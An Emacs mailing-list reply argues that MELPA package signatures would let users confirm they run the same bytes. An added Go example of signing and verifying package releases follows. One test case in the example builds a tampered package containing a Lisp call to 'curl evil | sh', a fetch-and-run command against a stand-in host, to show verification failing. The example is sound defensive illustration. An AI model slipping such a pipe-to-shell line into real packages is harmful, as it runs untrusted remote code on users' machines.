Tim,

> I think you missed my point. There is no benefit in MELPA adopting
> signed packages because there is no formal code review and no vetting
> of the individuals who submit the code.

It occurs to me there might be one benefit: if George, whom you trust,
says, "I've been running version 1.2.3 of package xYandZ from MELPA and
I have a lot of confidence in it", then if you find that version of that
package with a trusted MELPA signature, you maybe know that you and
George are running the same software, i.e. it helps with the "web of
trust" (if people still talk of that).

(so, the requirement for this is not audited packages, but a solid,
"secure", release procedure by MELPA.)

cheers, Greg
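As an added example, not part of this thread and not MELPA's or package.el's own code, the mechanism behind Greg's point in Go: the archive signs a record that binds package name, version string and the SHA-256 of the served bytes, and a client checks the signature and then the digest. Ed25519 from the Go standard library stands in for the GPG signatures package.el actually uses, the record layout is hypothetical, and the package contents are constructed sample data. If two people both verify the same signed record, they hold identical bytes; a modified file or a re-labelled version fails.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Release is the record a signing archive publishes per package version.
// Hypothetical layout for this example, not MELPA's archive-contents format.
type Release struct {
	Name    string
	Version string
	SHA256  string // hex digest of the exact package bytes served
}

// PackageDigest returns the hex SHA-256 of the package bytes.
func PackageDigest(pkg []byte) string {
	sum := sha256.Sum256(pkg)
	return hex.EncodeToString(sum[:])
}

// NewRelease builds the record the archive would sign for pkg.
func NewRelease(name, version string, pkg []byte) Release {
	return Release{Name: name, Version: version, SHA256: PackageDigest(pkg)}
}

// canonical is the byte string actually signed: name, version and digest
// are all covered, so none of them can be swapped independently.
func (r Release) canonical() []byte {
	return []byte(r.Name + "\x00" + r.Version + "\x00" + r.SHA256)
}

// GenerateArchiveKey stands in for the archive's long-lived signing key.
// Ed25519 is used only because it is in the standard library (assumption);
// package.el verifies GPG signatures.
func GenerateArchiveKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// Sign is the archive side of the release procedure.
func Sign(priv ed25519.PrivateKey, r Release) []byte {
	return ed25519.Sign(priv, r.canonical())
}

// Verify is the client side: the archive signature on the record first,
// then that the bytes actually fetched match the digest the archive signed.
func Verify(pub ed25519.PublicKey, r Release, sig, pkg []byte) error {
	if !ed25519.Verify(pub, r.canonical(), sig) {
		return errors.New("archive signature does not verify for " + r.Name + " " + r.Version)
	}
	if PackageDigest(pkg) != r.SHA256 {
		return errors.New("package bytes do not match the signed digest for " + r.Name + " " + r.Version)
	}
	return nil
}

// SameSoftware answers the question in the mail: if both copies verify
// against one signed record, they are the same bytes.
func SameSoftware(pub ed25519.PublicKey, r Release, sig, mine, theirs []byte) (bool, error) {
	if err := Verify(pub, r, sig, mine); err != nil {
		return false, err
	}
	if err := Verify(pub, r, sig, theirs); err != nil {
		return false, err
	}
	return PackageDigest(mine) == PackageDigest(theirs), nil
}

func main() {
	pub, priv := GenerateArchiveKey()
	// Constructed sample package contents; not a real MELPA package.
	pkg := []byte(";;; xYandZ.el --- constructed sample package 1.2.3\n(provide 'xYandZ)\n")
	rel := NewRelease("xYandZ", "1.2.3", pkg)
	sig := Sign(priv, rel)

	// George and I both fetched "xYandZ 1.2.3"; both copies verify.
	ok, err := SameSoftware(pub, rel, sig, pkg, pkg)
	fmt.Println("same software:", ok, "err:", err)

	// A mirror hands me a modified file under the same label: digest fails.
	tampered := append(append([]byte{}, pkg...), []byte("(shell-command \"curl evil | sh\")\n")...)
	fmt.Println("tampered copy:", Verify(pub, rel, sig, tampered))

	// Relabelling the record as another version fails: the version is signed.
	relabelled := rel
	relabelled.Version = "1.2.4"
	fmt.Println("relabelled record:", Verify(pub, relabelled, sig, pkg))
}
```

The point this makes concrete is the one in the mail: the signature says nothing about whether the code was reviewed, only that the version label and the bytes came from the archive's release procedure, which is exactly what is needed for "George runs 1.2.3" to mean "George runs these bytes".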
